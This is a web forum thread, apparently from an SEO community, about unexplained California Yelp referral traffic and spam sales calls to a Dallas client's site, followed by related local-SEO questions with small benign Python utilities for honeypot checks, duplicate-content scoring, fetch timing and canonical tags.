Need Help: Trouble With Website and Analytics
-
Hey all,
I have a client whose site I've been having the WORST time getting traffic and relevant-keyword rankings for. I've tried so many things and have yet to see much progress after about 9 months.
Site is mgmcdallas.com. I noticed something REALLY weird with it a couple of weeks ago.
The business has a Dallas, TX address and really only services the Dallas/Fort Worth metro area.
They recently started getting some referral traffic from yelp.com/biz_redir. Weirdly, they've also been getting more sales calls and more salespeople filling out their contact form.
Take January, for example: they had 164 sessions, and 119 of those were from this Yelp referral. They DON'T advertise with Yelp or get traffic from Yelp anywhere in Texas. You can see from the screenshot below that the visits are all coming from California.
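To put those numbers in perspective, a quick back-of-the-envelope check (the session counts are from the post above; nothing else is real data):

```python
# January session counts reported in the post.
total_sessions = 164
yelp_referral_sessions = 119

# Share of all traffic attributable to the yelp.com/biz_redir referral.
share = yelp_referral_sessions / total_sessions
print(f"Yelp referral share: {share:.1%}")  # roughly 72.6% of January sessions
```

In other words, nearly three quarters of the month's traffic is this one out-of-state referral, which is why it dominates everything else in the reports.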
I've had our <acronym title="Search Engine Optimization">SEO</acronym> and developer look into it, and we can't figure out what's happening. Any thoughts?
-
Bump. Just curious if anyone has any new ideas on this? We still have not found a solution.
-
Hmm. Yeah, I will add the CAPTCHA to see if it helps. I'll also see if I can add them to no-call lists. But it's very frustrating for the client, because he is now getting A LOT of salespeople calling him daily b/c of this issue, and he happens to remind me about it almost daily.
It hasn't just been happening for a couple of weeks, either. It's been going on for about 6-7 weeks now.
-
Honestly, I would not worry about it too much; their Yelp page has a lot of positive reviews, so deleting it would hurt them. You could try adding a CAPTCHA to the contact form to dissuade salespeople and stop auto-fill bots, but that could inconvenience potential customers, so you will need to weigh the pros and cons. You could also try adding their number to do-not-call lists to see if that helps. I don't think there will be a ton of calls in the long run, though; things like this tend to spike for a week or two and then drop off.
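If a full CAPTCHA feels like too much friction for real customers, a honeypot field is a lighter-weight alternative worth considering. A minimal sketch of the server-side check, assuming a plain form POST; the field name and handler shape are hypothetical:

```python
# Honeypot check for a contact-form handler (framework-agnostic sketch).
# The form includes a hidden input named "website_url" that humans never see;
# auto-fill bots tend to populate every field, so submissions with that
# field filled can be silently dropped.

def is_probable_bot(form_data: dict) -> bool:
    # Hidden field filled in -> almost certainly an auto-fill bot.
    return bool(form_data.get("website_url", "").strip())

# A human leaves the hidden field empty; a bot fills it.
human = {"name": "Jane", "phone": "214-555-0100", "website_url": ""}
bot = {"name": "SEO Co", "phone": "000", "website_url": "http://spam.example"}
print(is_probable_bot(human))  # False
print(is_probable_bot(bot))    # True
```

The upside over a CAPTCHA is zero friction for legitimate visitors; the downside is that it only catches naive auto-fill bots, not humans filling out the form by hand.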
-
They haven't really lost traffic; they didn't have much to begin with. They have no penalties according to GWT and other tools.
-
Sorry about that. I think I got the image added properly now. You can see that all the traffic comes from different cities in California.
I just logged into their biz.yelp.com page, and they have had a big increase in traffic to their Yelp profile from January to the present.
I have disabled bots in the view settings. It definitely looks like their information is somehow being sold to salespeople. Any way to get rid of this without deleting their Yelp page?
-
Have you run it through the Panguin tool to check whether they have received any penalties? Did they have traffic and lose it, or did they never have traffic?
-
Ben,
Your image did not link properly, so I cannot see the data. Does the majority of the CA traffic come from one or a few places that are not major cities? Have you disabled bots in the view settings? It seems to me that there might be a bot crawling Yelp listings in that area, collecting and verifying phone numbers to sell.
Related Questions
-
Ecommerce Site Structure -- "/our_locations" page: helpful or harmful?
Hello! We are a retailer with brick-and-mortar stores in different cities. We have a website (ourbusiness.com), which includes a blog (ourbusiness.com/blog) and a separate ecommerce site for each store in subfolders (ourbusiness.com/Boston-store and ourbusiness.com/Atlanta-store). NB: We do this for non-business reasons and have no choice, so this is not like REI (for example) or other stores with lots of locations but one central ecommerce operation. Most experts seem to recommend a site structure that echoes REI's, i.e., a home page principally devoted to ecommerce (rei.com) that includes an Our Locations-type page (rei.com/stores), which links to local store pages like rei.com/stores/fresno. I understand how this would help REI, since their homepage is devoted to ecommerce and they need a store locator page that doesn't compete with the shopping experience. But since we can't send people to products directly from our home page, is there any reason for us not to put the store locator function right on the home page? That is, is there any reason in our case to prefer (A) ourbusiness.com/our_locations/Boston_store over (B) ourbusiness.com/Boston-store? As I see it, the extra page (/our_locations/) could actually hurt, as it puts products one click further away from customers and one link deeper for bots. On the other hand, it may make the multi-store structure clearer to bots (and maybe people) and help us in local search. Finally, would it make a difference if there were 10 stores vs 2? Thanks for any thoughts!
Local Website Optimization | | RankAmateur...1 -
Dual website strategy
We have two websites (different businesses) in the technology sector that sell the same products on the same platform (OSC) but have different branding. We have tried to make the static content different, and the user-generated content is different. The SEO is largely different too, but one site has much better rankings than the other. The underperforming site is not responsive yet, and I need to decide whether to merge the two businesses into one site or continue with the two-separate-websites approach. I would only pursue the latter, and invest further time and effort into the underperforming website, if I knew I was on the right track. My SEO knowledge is not extensive, so I would be interested in any views the community has. I note that kogan.com.au and dicksmith.com.au have a similar dual-website approach (same company), and they are both major brands in Australia. I thank you in advance for any thoughts you may have.
Local Website Optimization | | Alpine91 -
Even after doing every possible thing required for SEO, my client's website is still not ranking at the top. Can you tell me where I am lacking?
Hi team, I have been working on a website called signboards.co.in for 4 months. It was not in the top 100, but it is now below 50 for 2-3 keywords. Even after submitting to many directories following competitor analysis, Moz shows only one external link in its link metrics. Apart from this, every possible thing required for SEO has been done properly, but it is still not giving results. Can you help me out? All my other clients' work is going well except this one. Can you please let me know what is going wrong with my project? As the project submission date is near, I need your help as soon as possible. Thanks, Najia jehan
Local Website Optimization | | Najia-ali0 -
Client wants to rebrand but insists on keeping their old website live as well...
I am working with a client in the dental space who has an existing (11-year-old) website for his practice. His domain is tied to his last name, which he would like to get away from because he plans to sell the practice in the next couple of years. Backstory: Prior to taking him on, he was working with an SEO agency out of India that built him quite an ugly backlink profile. Once we discovered it, we immediately notified him about the risk of a penalty if it was left alone. He was riding high in Google SERPs, so of course it was of no concern to him. Needless to say, about a year ago he was inducted into Google's "manual penalty club" for suspicious links. His site vanished from Google and all! Hooray! But no, not really... We met with him to discuss the options, suggesting we clean up his backlink profile and then submit for reconsideration. Based on the time we told him it could take to make progress and be back up and running, he wasn't very excited about that approach. He said he wanted us to build a new site, with a new domain, and start fresh. In addition, he wanted to keep his original site live, since it is tied to his already thriving practice. To sum it all up, his goal is to keep what he has live, since his customers are accustomed to using his existing (penalized) website, while building a new brand/website that he can use to build a cleaner backlink profile and rank in Google, and that he can sell off down the line without having his name tied to the practice. Question: Given that he has an existing site with the company NAP info throughout, and the new site will have the same NAP (just a different domain/brand), is there a "best way" to approach this? The content on the new site would be completely unique. I understand this approach is iffy, but in his situation it makes sense to some extent. Any feedback or ideas on how to best handle having two sites running for the same dental practice?
If any part of my question is confusing or you need further details to help make a suggestion, please fire away and I will be happy to give as much detail as possible. Thanks Mozzers!
Local Website Optimization | | Bryan_Loconto1 -
Local SEO HELP for Franchise SAB Business
This all began when I was asked to develop experiment parameters for our content protocol and strategy. It should be simple, right? I've reviewed A/B testing tips for days now, from Moz and other sources. I'm totally amped and ready to begin testing in Google Analytics. Say we have a restoration-service franchise with over 40 franchisees we perform SEO for, all over the US. Every franchise has its own local website, e.g. restorationcompanylosangeles.com. Every franchise purchases territories in which it wants to rank; some service over 100 cities. Most franchises also have PPC campaigns, and as part of our strategy we incorporate the location-reach data from AdWords to focus on their high-reach locations first. We have 'power pages' which include 5 high-reach branch preferences (areas the owners prefer to target) and 5 non-branch-preference high-reach locations. We are working heavily on our national brand presence, working with PR and local news companies to build relationships for natural backlinks, and developing a social media strategy for national and local outlets. We use major aggregators to distribute local citations for our branch offices and make sure all NAP is consistent across citations. We are partners with Google, so we work with them on newly developing branches to create their Google listings (MyBusiness & G+). We use local business schema markup on all pages. Our content protocol encompasses all the needed on-site optimization tactics: meta, titles, schema, keyword placement, semantic Q&A, internal linking strategies, etc. Our leads are calls and form submissions. We use several call tracking services to monitor calls, caller locations, etc., and we are testing CallRail to start monitoring which landing pages and keywords generate our leads. Parts that I want to change: Some of the local sites have over 100 pages targeting 'water damage + city', aka what Moz would call "doorway pages." These pages have 600-1000 words all talking about the services we provide. Our writers (4 of them) manipulate them so that they aren't duplicate pages, but they add only about 100 words about the city location; this is the only unique variable. We pump out about 10 new local pages a month per site, so yes, over 300 local pages a month. Traffic to the local sites is very scarce. The content protocol/strategy is tested based on ranking only! We have a tool that monitors ranking on all domains, but it does not account for mobile, local, or user-preference-based searching like Google Now. My team is deeply attached to basing our metrics solely on ranking. The logic is that if no local city page exists for a targeted location, there is less likelihood of ranking for that location, and if you are not seen, you will not get traffic or leads. Ranking for power locations is poor, while less competitive low-reach locations rank OK. We are updating the content protocol by tweaking small things (multiple variants at a time), then checking ranking every day for about a week to determine whether the experiment was a success. What I need: An internal duplicate content analyzer, to prove that writing over 400 pages a month about 'water damage + city' IS duplicate content. Unique content for 'power pages': I know from dozens of chats here in the community and in Moz blogs that we can only truly create quality content for 5-10 pages, meaning we need to narrow down which locations are most important to us and beef them up. Blog content for non-'power' locations. A new experiment protocol based on metrics like traffic, impressions, bounce rate, landing page analysis, domain authority, etc. Digging deeper into call metrics and their sources. Now I am at a roadblock, because I cannot develop valid content-experiment parameters based on ranking. I know that A/B testing requires testing two pages that are the same except for one variable.
We'd either noindex one or canonicalize it, and neither is in favor of testing ranking for the same term. Questions: Are all these local pages duplicate content? Is there such a thing as content experiments based solely on ranking? Any other suggestions for this scenario?
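The "internal duplicate content analyzer" asked for above can be prototyped in a few lines with word-shingling and Jaccard similarity. A sketch; the page texts are illustrative stand-ins, not real site copy:

```python
# Shingle each page's text into overlapping word 5-grams, then compare pages
# pairwise with Jaccard similarity. City-swap pages that reuse the same body
# copy score far above what independently written pages would.

def shingles(text: str, k: int = 5) -> set:
    words = text.lower().split()
    return {" ".join(words[i:i + k]) for i in range(max(1, len(words) - k + 1))}

def jaccard(a: set, b: set) -> float:
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)

base = ("we provide fast water damage restoration with certified "
        "technicians available around the clock")
page_dallas = base + " serving dallas and nearby suburbs"
page_plano = base + " serving plano and nearby suburbs"

score = jaccard(shingles(page_dallas), shingles(page_plano))
print(f"similarity: {score:.2f}")  # prints: similarity: 0.56
```

Even in this tiny example, where only the city phrase differs, over half the shingles match; on 600-1000 word pages that differ by ~100 city-specific words, the score climbs much higher, which is the quantitative evidence the team is asking for.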
Local Website Optimization | | MilestoneSEO_LA1 -
Main website and microsite: do I do Google Places for both, as it will technically be duplicating the locations?
Hi all, I have a main eCommerce website which trades out of a number of locations, and all these locations appear in Google Places, although they don't rank particularly well there. I also have a number of microsites which are specific to one type of product I sell, and these rank very well locally. My question is: should I also do Google Places for my microsites? This would technically mean I am creating a duplicate location listing in Google Places, but for a different website/business. I only have one Google account, so I guess this would be done under the same account? Thanks, Pete
Local Website Optimization | | PeteC120 -
How slow can a website be and still be OK for visitors and SEO?
Hello all, my site http://www.allspecialtybuildings.com is a barn construction site, and our visitors are usually local. I am worried about page speed. I have been using Google PageSpeed Insights and GTmetrix; although I cannot figure out the "leverage browser caching" recommendation, I have a 79/93 Google score and a 98/87 GTmetrix score. Load times vary between 2.13 and 2.54 seconds. What is acceptable? I want to make sure I get Google love for decent page speed, and to me these times are great; bad times are 7 seconds and higher. I have thought about a CDN, yet I have read horror stories too. I have ZERO idea of how to use a CDN, or whether I need one. I just want a fast site that is friendly to both users and Google. So my question is: what counts as slow for a website? Is under 3 seconds considered OK, or bad for SEO? Any advice is greatly appreciated.
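For what it's worth, raw fetch time can be sanity-checked without a third-party tool. A minimal sketch; note it measures only the HTML download, not rendering or assets, so it will understate what GTmetrix reports. The demo uses an inline data: URL so the snippet runs offline; swap in the real site URL to time an actual fetch:

```python
import time
import urllib.request

def fetch_time(url: str, timeout: float = 10.0) -> float:
    """Seconds to download the raw response body. Excludes rendering,
    images, scripts, and fonts, so user-perceived load time is higher."""
    start = time.perf_counter()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return time.perf_counter() - start

# Offline demo; replace with "http://www.allspecialtybuildings.com"
# to time the real site over the network.
elapsed = fetch_time("data:text/plain,hello")
print(f"fetched in {elapsed:.3f}s")
```

Running this a few times at different hours gives a cheap baseline to compare against the GTmetrix numbers and spot server-side slowdowns.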
Local Website Optimization | | asbchris0 -
Website and eshop with the same product description: is it duplicate content?
Hi there! I'm building a website that is divided into "marketing" and "shop" sections. The two sites are being authored by two companies (my company is doing the marketing one). The marketing site has all the company's products, while the shop will sell just some of them. I'm facing the problem of duplicated content and want to ask you guys whether it would be a problem/mistake to use the same product description (and a similar URL) for the same product on both sites, and what the right way to do it is (without rewriting the product descriptions). The main site will be www.companyname.com and the shop will be shop.companyname.com. Thanks, Francesco
Local Website Optimization | | svitol0
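One common answer to the situation described above is a cross-domain rel=canonical from each shop product page to the matching main-site page, so the shared description consolidates to one URL in search. A sketch of a checker for that tag; the domain and path are placeholders taken from the post:

```python
from html.parser import HTMLParser

class CanonicalFinder(HTMLParser):
    """Collects href values of <link rel="canonical"> tags in a page."""
    def __init__(self):
        super().__init__()
        self.canonicals = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and a.get("rel") == "canonical" and "href" in a:
            self.canonicals.append(a["href"])

# A shop page that correctly points at the main-site version of the product.
shop_page_html = """
<html><head>
  <link rel="canonical" href="http://www.companyname.com/products/widget">
</head><body>Product description...</body></html>
"""

finder = CanonicalFinder()
finder.feed(shop_page_html)
print(finder.canonicals)  # ['http://www.companyname.com/products/widget']
```

Run against each shop.companyname.com product page, this confirms the duplicated descriptions all declare the main-site URL as canonical rather than competing with it.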